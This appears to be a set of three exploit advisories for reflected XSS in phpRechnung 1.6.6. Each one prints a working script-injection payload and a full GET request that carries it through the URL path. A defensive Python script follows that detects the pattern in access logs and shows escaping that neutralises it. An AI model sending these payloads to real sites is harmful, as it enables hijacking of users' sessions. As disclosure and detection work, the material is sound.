===========================================================================================
# Exploit Title: phpRechnung 1.6.6 - 'list.php' XSS Injection
# CVE: N/A
# Date: 03-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/phprechnung/
# Software Link: https://sourceforge.net/projects/phprechnung/
# Version: v1.6.6
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: phpRechnung is an easy-to-use, web-based, multilingual accounting application.
===========================================================================================
# POC - XSS
# Parameters : addressbook,cashbook,invoice,offer,payment,position,syslog,user
# Attack Pattern : /'"--></style></scRipt><scRipt>alert(0x0005CD)</scRipt>
# GET Request : http://localhost/phpRechnung/addressbook/list.php/'"--></style></scRipt><scRipt>alert(0x0005CD)</scRipt>
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: phpRechnung 1.6.6 - 'index.php' XSS Injection
# CVE: N/A
# Date: 03-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/phprechnung/
# Software Link: https://sourceforge.net/projects/phprechnung/
# Version: v1.6.6
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: phpRechnung is an easy-to-use, web-based, multilingual accounting application.
===========================================================================================
# POC - XSS
# Parameters : reports
# Attack Pattern : /'"--></style></scRipt><scRipt>alert(0x000E9B)</scRipt>
# GET Request : http://localhost/phpRechnung/reports/index.php/'"--></style></scRipt><scRipt>alert(0x000E9B)</scRipt>
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: phpRechnung 1.6.6 - 'searchlist.php' XSS Injection
# CVE: N/A
# Date: 03-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/phprechnung/
# Software Link: https://sourceforge.net/projects/phprechnung/
# Version: v1.6.6
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: phpRechnung is an easy-to-use, web-based, multilingual accounting application.
===========================================================================================
# POC - XSS
# Parameters : user
# Attack Pattern : /'"--></style></scRipt><scRipt>alert(0x002883)</scRipt>
# GET Request : http://localhost/phpRechnung/user/searchlist.php/'"--></style></scRipt><scRipt>alert(0x002883)</scRipt>
===========================================================================================
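All three PoCs above share one shape: the payload is not a query-string parameter but extra path information appended after the script name (`list.php/...`, `index.php/...`, `searchlist.php/...`), which the page reflects into the response unescaped. The snippet below is an added, defender-side example and is not part of the advisories or of phpRechnung itself. It parses access-log lines, isolates the PATH_INFO portion after `.php`, percent-decodes it (repeatedly, so double-encoded markup is also caught) and flags segments carrying markup characters, then shows that HTML-escaping the reflected value neutralises the reported payload. The log lines are constructed to mirror the three GET requests above plus two benign requests; the log format and the assumption that PATH_INFO is the reflected value are mine, inferred from the URLs, not stated by the author.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample log lines (Apache common-log style), modelled on the three
# GET requests quoted in the advisories, URL-encoded as a server would record
# them, plus two benign requests. Illustrative only, not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Mar/2019:10:00:01 +0000] "GET /phpRechnung/addressbook/list.php/%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0005CD)%3C/scRipt%3E HTTP/1.1" 200 5123
10.0.0.5 - - [03/Mar/2019:10:00:02 +0000] "GET /phpRechnung/reports/index.php/%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x000E9B)%3C/scRipt%3E HTTP/1.1" 200 4811
10.0.0.5 - - [03/Mar/2019:10:00:03 +0000] "GET /phpRechnung/user/searchlist.php/%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x002883)%3C/scRipt%3E HTTP/1.1" 200 4020
10.0.0.7 - - [03/Mar/2019:10:00:04 +0000] "GET /phpRechnung/addressbook/list.php?page=2 HTTP/1.1" 200 5123
10.0.0.8 - - [03/Mar/2019:10:00:05 +0000] "GET /phpRechnung/user/searchlist.php/archive/2018 HTTP/1.1" 200 3999
"""

# client, request line (method, target, protocol); other fields are skipped.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Split "/dir/script.php/extra/path" into the script and its trailing PATH_INFO.
SCRIPT_RE = re.compile(r"^(?P<script>.*?\.php)(?P<path_info>/.*)?$", re.IGNORECASE)
# Markup that has no legitimate place inside a path segment of this application.
MARKUP_RE = re.compile(r"<\s*/?\s*(script|style)\b|[<>\"']", re.IGNORECASE)


def decode_fully(value, rounds=3):
    """Percent-decode until stable so %253C (double-encoded '<') is also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_path_info_injection(log_text):
    """Return one finding per request whose PATH_INFO carries HTML markup."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0]  # query string is not PATH_INFO
        sm = SCRIPT_RE.match(path)
        if not sm or not sm.group("path_info"):
            continue
        path_info = decode_fully(sm.group("path_info"))
        if MARKUP_RE.search(path_info):
            findings.append({
                "client": m.group("client"),
                "script": sm.group("script"),
                "path_info": path_info,
            })
    return findings


def escape_for_html(untrusted):
    """Context-correct output encoding for an HTML body or attribute value.

    Hypothetical fix-side helper: with quote=True both quote characters are
    encoded, so the reported payload can neither close an attribute nor open
    a tag once it is reflected.
    """
    return html.escape(untrusted, quote=True)


if __name__ == "__main__":
    for finding in find_path_info_injection(SAMPLE_LOG):
        print(f"{finding['client']} -> {finding['script']} PATH_INFO={finding['path_info']!r}")
        print("   escaped:", escape_for_html(finding["path_info"]))
```

Running the block flags exactly the three advisory requests and leaves `list.php?page=2` and `searchlist.php/archive/2018` alone; the escaped form of each payload contains `&lt;`, `&quot;` and `&#x27;` in place of the characters the payload relies on. In a real deployment the same PATH_INFO check belongs in a WAF or log pipeline rule, and the escaping belongs at every point where the request path is written into the page.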